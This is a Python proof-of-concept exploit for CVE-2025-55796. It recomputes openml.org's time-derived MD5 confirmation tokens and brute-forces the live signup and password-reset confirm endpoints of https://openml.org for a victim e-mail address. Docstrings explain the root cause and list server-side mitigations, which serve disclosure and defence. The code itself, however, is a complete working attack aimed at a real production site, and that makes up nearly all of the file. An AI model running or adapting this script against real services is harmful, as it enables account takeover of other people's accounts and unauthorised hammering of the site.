#!/usr/bin/env python3
"""
CVE-2025-55796 PoC - openml.org Predictable Token Generation
This PoC demonstrates the token prediction vulnerability in openml.org
"""
import hashlib
from datetime import datetime, timedelta
import requests
import itertools
def generate_predictable_token(timestamp):
    """Recompute the confirmation token the vulnerable scheme derives from a time.

    The token is the hex MD5 digest of ``timestamp`` rendered as
    ``"%d %H:%M:%S"`` (day of month, then wall-clock time to the second).

    Nothing else enters the hash: no secret key, no user identifier and no
    random value. That is the root cause this PoC illustrates. Anyone who
    can estimate the issuance second can recompute the token. The remedy on
    the issuing side is an unguessable token from a CSPRNG (for example
    ``secrets.token_urlsafe()``), stored server-side with an expiry and
    compared with ``hmac.compare_digest``.

    Args:
        timestamp: A ``datetime`` for the second to derive the token for.

    Returns:
        The 32-character lowercase hexadecimal MD5 digest.
    """
    digest_input = timestamp.strftime("%d %H:%M:%S").encode()
    hasher = hashlib.md5()
    hasher.update(digest_input)
    return hasher.hexdigest()
def generate_token_candidates(start_time, end_time, step_seconds=1):
    """List every token the scheme would have produced inside a time window.

    Walks from ``start_time`` to ``end_time`` (both inclusive) in increments
    of ``step_seconds`` and derives the token for each instant with
    ``generate_predictable_token``.

    The length of the returned list is the whole search space for that
    window, which is what makes the issuing scheme weak. It is also why
    per-account attempt limits and single-use, short-lived tokens are the
    relevant server-side controls.

    Args:
        start_time: First ``datetime`` of the window.
        end_time: Last ``datetime`` of the window (included).
        step_seconds: Spacing between instants, in seconds.

    Returns:
        A list of ``(token, datetime)`` tuples in chronological order.
    """
    def _instants():
        # Yield each instant of the window in order; the step is applied
        # only after the consumer has handled the current instant.
        moment = start_time
        while moment <= end_time:
            yield moment
            moment = moment + timedelta(seconds=step_seconds)

    return [(generate_predictable_token(moment), moment) for moment in _instants()]
def brute_force_token(target_url, email, operation='signup', time_window_minutes=5):
    """Submit every candidate token from a recent time window to the confirm endpoint.

    The window ends at ``datetime.now()`` and starts ``time_window_minutes``
    earlier. One GET request is sent per candidate to
    ``{target_url}/confirm/{operation}`` with ``email`` and ``token`` as
    query parameters. The first response with status 200 whose body
    contains the word "success" (case-insensitive) is treated as a hit.

    Defender's view: in access logs this appears as a run of requests to
    ``/confirm/<operation>`` with one fixed ``email`` and a different
    32-hex-character ``token`` on each request. Alerting on repeated failed
    confirmations per account or per source, rate-limiting the endpoint,
    and issuing random single-use tokens with a short expiry are the
    corresponding mitigations.

    NOTE(review): the success test is a heuristic taken from the page; the
    server's actual response format is not shown here.

    Args:
        target_url: Base URL of the application under test.
        email: Address of the account whose confirmation is being checked.
        operation: Path segment after ``/confirm/`` (the page lists
            signup, password_reset, email_change).
        time_window_minutes: How far back from now the window reaches.

    Returns:
        ``(token, timestamp)`` for the first accepted candidate, or
        ``(None, None)`` when no candidate in the window is accepted.
    """
    # Calculate time window
    window_end = datetime.now()
    window_start = window_end - timedelta(minutes=time_window_minutes)
    print(f"[*] Generating tokens for time window: {window_start} to {window_end}")

    candidates = generate_token_candidates(window_start, window_end)
    print(f"[*] Generated {len(candidates)} token candidates")

    # The endpoint depends only on the arguments, so build it once.
    confirm_url = f"{target_url}/confirm/{operation}"

    # Try each token
    for candidate, issued_at in candidates:
        query = {'email': email, 'token': candidate}
        try:
            reply = requests.get(confirm_url, params=query, timeout=5)
            # Check for successful confirmation
            accepted = reply.status_code == 200 and 'success' in reply.text.lower()
            if accepted:
                print(f"[!] Valid token found: {candidate}")
                print(f"[!] Token generated at: {issued_at}")
                print(f"[!] {operation} confirmed successfully!")
                return candidate, issued_at
        except requests.exceptions.RequestException as e:
            # A failed request is reported and the next candidate is tried.
            print(f"[!] Request error: {e}")

    print("[-] No valid token found in time window")
    return None, None
# Example usage
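if __name__ == "__main__":
    target = "https://openml.org"
    # The page's e-mail obfuscation replaced the address with the literal
    # text "[email protected]" and split the string over two lines, which
    # does not parse. It is rejoined here. The value is a redaction marker,
    # not a real address.
    victim_email = "[email protected]"

    banner = "=" * 60
    print(banner)
    print("CVE-2025-55796 - openml.org Predictable Token PoC")
    print(banner)

    # Attack scenarios: the same five-minute window is checked for the
    # signup confirmation and then for the password-reset confirmation.
    brute_force_token(target, victim_email, 'signup', time_window_minutes=5)
    brute_force_token(target, victim_email, 'password_reset', time_window_minutes=5)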